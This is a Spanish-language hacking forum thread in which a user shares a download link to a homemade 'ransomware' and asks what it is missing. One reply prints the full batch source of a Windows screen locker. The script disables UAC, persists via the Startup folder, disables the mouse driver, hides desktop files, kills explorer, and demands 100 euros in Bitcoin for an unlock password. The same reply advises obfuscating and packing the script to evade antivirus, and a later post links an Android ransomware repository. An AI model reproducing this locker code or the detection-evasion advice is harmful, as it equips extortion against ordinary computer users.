Título: He creado un Ransomware pero creo que me flata algo
Publicado por: Tirenex en 16 Octubre 2021, 18:08 pm
Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará
http://www.mediafire.com/folder/hvhw,gq5xoa2e2jdctdo/shared
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: Xyzed en 16 Octubre 2021, 21:05 pm
Hola.
Dale, ahí ejecuto el ransomware y te cuento que tal...
:silbar:
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: Panic0 en 16 Octubre 2021, 23:58 pm
Les dejo el link para que prueben qué le falta, ya que yo lo tengo probado y no sé al 100% si funcionará
http://www.mediafire.com/folder/hvh44yd4u0uw8hw,gq5xoa2e2jdctdo/shared
Lo que le falta es que mediafire no lo detecté como virus... Ya hablando enserio, no esperes publicar un malware y que la gente lo vaya a abrir en un foro de hackers.
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: **Aincrad** en 17 Octubre 2021, 03:00 am
Bueno primero que todo , Batch , enserio ? :silbar: Esto no cifra archivos, por lo tanto ni lo consideraría un ransomware. Segundo, Al menos Ofúscalo, te recomiendo mi herramienta : https://toolslib.net/downloads/viewdownload/631-batch-ide/ (https://toolslib.net/downloads/viewdownload/631-batch-ide/) Por ejemplo convierte el .bat a .js y después a .hta, luego lo empaquetas con upx y con eso seguro bajas el ratio de detecciones. Ransomware.bat :P o off REG ADD HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f copy Ransomware.bat "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" @Echo off set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" /f reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "TE DIJE QUE NO APAGARAS EL PC" /f Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "AHORA TE HE ROBADO EL MOUSE [PULSA BARRA ESPACIADORA O INTRO PARA CONTINUAR]" /f @echo off ATTRIB +H +S "C:\Users\%USERNAME%\Desktop\*" /S /D echo on color 0A @echo off title RANSOMWARE taskkill /f /im explorer.exe :bucle cls echo ================================================================================= echo LEE CON ATENCION echo SI QUIERE RECUPERAR LA CUENTA! echo ================================================================================= echo - No reiniciar este PC!. echo - Al reiniciar se eliminara los datos del disco duro!. echo - Si usted cierra esta ventana no podra recuperar el PC!. echo - ENVIAR 100 Euros A esta direccion de BTC "35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh" echo SI QUIERE OBTENER LA CLAVE!. echo ================================================================================= echo - Le daremos la clave al recibir el dinero echo ================================================================================= set /p pass= Escriba aqui el password: if %pass%==BvMIb2OBLM4l8RUFCpn0i3C (goto passcorrecto) ELSE (goto bucle) :passcorrecto ATTRIB -H -S "C:\Users\%USERNAME%\Desktop\*" /S /D cls @echo off Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ImagePath" /t REG_EXPAND_SZ /d "\SystemRoot\System32\drivers\mouclass.sys" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Type" /t REG_DWORD /d "1" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Start" /t REG_DWORD /d "3" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "ErrorControl" /t REG_DWORD /d "1" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "DisplayName" /t REG_SZ /d "@msmouse.inf,%%mouclass.SvcDesc%%;Controlador de clase de mouse" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Owners" /t REG_MULTI_SZ /d "oem7.inf\0oem6.inf\0termmou.inf\0msmouse.inf" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass" /v "Group" /t REG_SZ /d "" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "0" /t REG_SZ /d "ACPI\VMW0003\4&1bd7f811&0" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "Count" /t REG_DWORD /d "3" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "NextInstance" /t REG_DWORD /d "3" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "1" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_00\8&367bfb7c&0&0000" /f Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\mouclass\Enum" /v "2" /t REG_SZ /d "HID\VID_0E0F&PID_0003&MI_01\8&12a4bdba&0&0000" /f Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeCaption" /t REG_SZ /d "" /f Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "LegalNoticeText" /t REG_SZ /d "" /f cd "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" del Ransomware.bat cls echo Felicidades! La clave es correcta. echo LEA ESTO!!! echo ======================================================== echo Para volver a tener el mouse operativo, reinicie su pc echo ======================================================== start explorer.exe start explorer.exe pause>nul pause>nul exit
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: Tirenex en 17 Octubre 2021, 13:03 pm
Amigo, te recomiendo que elimines o modifiques el Ransomware para que otra persona no lo copie y haga el mal, por favor sé bueno
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: **Aincrad** en 17 Octubre 2021, 17:53 pm
Nel, si querías sugerencias de que faltaba, debiste Poner el código fuente en la sección de scripts, No publicar un .exe y pretender que lo ejecutemos así nomas.
Por eso no quitare la source. además por que quitaría un simple batch que lo que hace es ocultar los archivos del escritorio y agregarse al inicio. quien querría usarlo ?
en pocas palabras tejo...
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: el-brujo en 18 Octubre 2021, 13:34 pm
SARA - Simple Android Ransomware Attack https://github.com/termuxhackers-id/SARA
poXKCgaBg3c
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: DebianWizzard en 7 Julio 2022, 05:10 am
Lo que le falta es que mediafire no lo detecté como virus... Ya hablando enserio, no esperes publicar un malware y que la gente lo vaya a abrir en un foro de hackers.
NECROBUMP MOMENT Oye, ¿no se supone que existen maquinas virtuales?
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: Infernoid en 12 Julio 2022, 01:33 am
Está bien hecho si dejamos de lado que esta en batch, cumple plenamente con el objetivo del ransomware. :huh:
Título: Re: He creado un Ransomware pero creo que me flata algo
Publicado por: Trollwer en 22 Julio 2022, 10:53 am
Lo estas haciendo con fines educativos? La dirección de BTC existe, y no tiene nada por el momento: https://www.blockchain.com/btc/address/35sP8MrpjWX7FHhy8wdv1hcSjMBokcQLRh Espero que no lo hagas con otros fines... :rolleyes: :rolleyes: :rolleyes:
|